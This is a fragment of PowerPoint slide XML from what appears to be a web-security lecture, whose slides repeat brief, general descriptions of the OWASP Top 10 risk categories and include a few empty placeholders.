              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E19840F3-CED1-471F-35C2-8057F37C6E07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="385510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4D1BF-344D-FF6D-E212-0640CFD96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6AC126-DA88-E06E-BB0A-156269905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A63FB6-4D42-D76A-3568-17ECA369F765}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45DC10C2-F9EF-3F31-D2FA-8C1A243E9183}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="268207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E5AEF-2D20-162F-C646-3575148C7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447DB-05B7-B222-8860-B4ED52C4C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DF0B8-4E23-2E10-9B39-1D6637F6118B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{26A7C423-B057-2E9D-FB07-9D7D0C10A16F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="632394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17FE3-294E-A605-01F5-C132E0F21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A9D3A-441F-93DD-3628-A26ED53ED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F6F9D9-859C-2CD8-5EC8-AAA5E3D2431C}"/>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F1E0EA47-B3F7-6F58-92DF-899079FA2A27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3697986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A01: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A user can access another user's account by manipulating URL parameters or session cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>A02: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Storing passwords in plain text, using weak encryption algorithms, or improper key management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A03: SQL injection (injecting malicious SQL code into input fields), command injection (injecting malicious commands into input fields).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A04: Building applications without considering security from the start, leading to vulnerabilities like insecure direct object references (IDOR) or broken authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A05: Default configurations on servers, databases, and applications, weak passwords, open cloud storage buckets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A06: Using outdated software with known vulnerabilities, relying on components with known security issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A07: Weak password policies, lack of multi-factor authentication, improper session management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A08: Lack of input validation, improper error handling, missing function level access control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A09: Inadequate logging and monitoring of system activity, lack of intrusion detection systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A10: Exploiting a web application to make requests to internal systems or other external servers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1053694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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2754564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5097D-394F-DF0B-EF9A-BF84985CB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B2394-6AA3-10EC-2F9D-634E61128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1604F-ADC8-3BA7-7BC7-D7EDC44C1A1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>A01: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A user can access another user's account by manipulating URL parameters or session cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>A02: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Storing passwords in plain text, using weak encryption algorithms, or improper key management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A03: SQL injection (injecting malicious SQL code into input fields), command injection (injecting malicious commands into input fields).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A04: Building applications without considering security from the start, leading to vulnerabilities like insecure direct object references (IDOR) or broken authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A05: Default configurations on servers, databases, and applications, weak passwords, open cloud storage buckets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A06: Using outdated software with known vulnerabilities, relying on components with known security issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A07: Weak password policies, lack of multi-factor authentication, improper session management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A08: Lack of input validation, improper error handling, missing function level access control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A09: Inadequate logging and monitoring of system activity, lack of intrusion detection systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A10: Exploiting a web application to make requests to internal systems or other external servers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AB87821-FBF0-4B24-E63D-3EC8927FC135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3920531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CDE79-D088-0243-C8FF-8DD1F8BC8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C971A1-05D5-2B5F-9D14-581E6976C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8AD219-5500-FCF3-9D25-CBB2C81BE21C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>A01: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A user can access another user's account by manipulating URL parameters or session cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>A02: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Storing passwords in plain text, using weak encryption algorithms, or improper key management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A03: SQL injection (injecting malicious SQL code into input fields), command injection (injecting malicious commands into input fields).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A04: Building applications without considering security from the start, leading to vulnerabilities like insecure direct object references (IDOR) or broken authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A05: Default configurations on servers, databases, and applications, weak passwords, open cloud storage buckets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A06: Using outdated software with known vulnerabilities, relying on components with known security issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A07: Weak password policies, lack of multi-factor authentication, improper session management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A08: Lack of input validation, improper error handling, missing function level access control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A09: Inadequate logging and monitoring of system activity, lack of intrusion detection systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A10: Exploiting a web application to make requests to internal systems or other external servers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A88F5AF2-810D-85C3-9846-12BB95D55248}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3752915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A1611-FAE7-3733-ED98-296323111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3A281-D669-6B43-42F4-9AAFE490F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A4AF9A-0E4F-F9CC-E28E-DA284DC6883B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>A01: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A user can access another user's account by manipulating URL parameters or session cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>A02: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Storing passwords in plain text, using weak encryption algorithms, or improper key management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A03: SQL injection (injecting malicious SQL code into input fields), command injection (injecting malicious commands into input fields).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A04: Building applications without considering security from the start, leading to vulnerabilities like insecure direct object references (IDOR) or broken authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A05: Default configurations on servers, databases, and applications, weak passwords, open cloud storage buckets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A06: Using outdated software with known vulnerabilities, relying on components with known security issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A07: Weak password policies, lack of multi-factor authentication, improper session management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A08: Lack of input validation, improper error handling, missing function level access control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A09: Inadequate logging and monitoring of system activity, lack of intrusion detection systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A10: Exploiting a web application to make requests to internal systems or other external servers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFB4C655-51D9-174B-3C75-B9EF3DB6EED2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1505836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5F4F5-3CCD-B479-145D-6F165CA77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7E636-8AF2-05C4-641A-8C5EA5937B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C62C4-3F25-11D4-342A-D90E5DAD5706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>Allow weak password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-MY" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>API: Expose excessive data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC082A33-24A7-C401-FEB9-E9E67814C78C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4080445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B9812-DD35-5724-5B1B-1D6C890CA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5BC025-C5B4-6607-1D70-F2EB11DB8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C7E53-36B0-48A4-FFB4-BE5995AC48D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>A01: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A user can access another user's account by manipulating URL parameters or session cookies.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-MY" dirty="0"/>
              <a:t>A02: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Storing passwords in plain text, using weak encryption algorithms, or improper key management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A03: SQL injection (injecting malicious SQL code into input fields), command injection (injecting malicious commands into input fields).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A04: Building applications without considering security from the start, leading to vulnerabilities like insecure direct object references (IDOR) or broken authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A05: Default configurations on servers, databases, and applications, weak passwords, open cloud storage buckets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A06: Using outdated software with known vulnerabilities, relying on components with known security issues.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A07: Weak password policies, lack of multi-factor authentication, improper session management.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A08: Lack of input validation, improper error handling, missing function level access control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A09: Inadequate logging and monitoring of system activity, lack of intrusion detection systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A10: Exploiting a web application to make requests to internal systems or other external servers.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64133678-C73E-6B6F-84A7-713924B87BC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{652F1279-6CE4-4169-83D3-4483097B6907}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
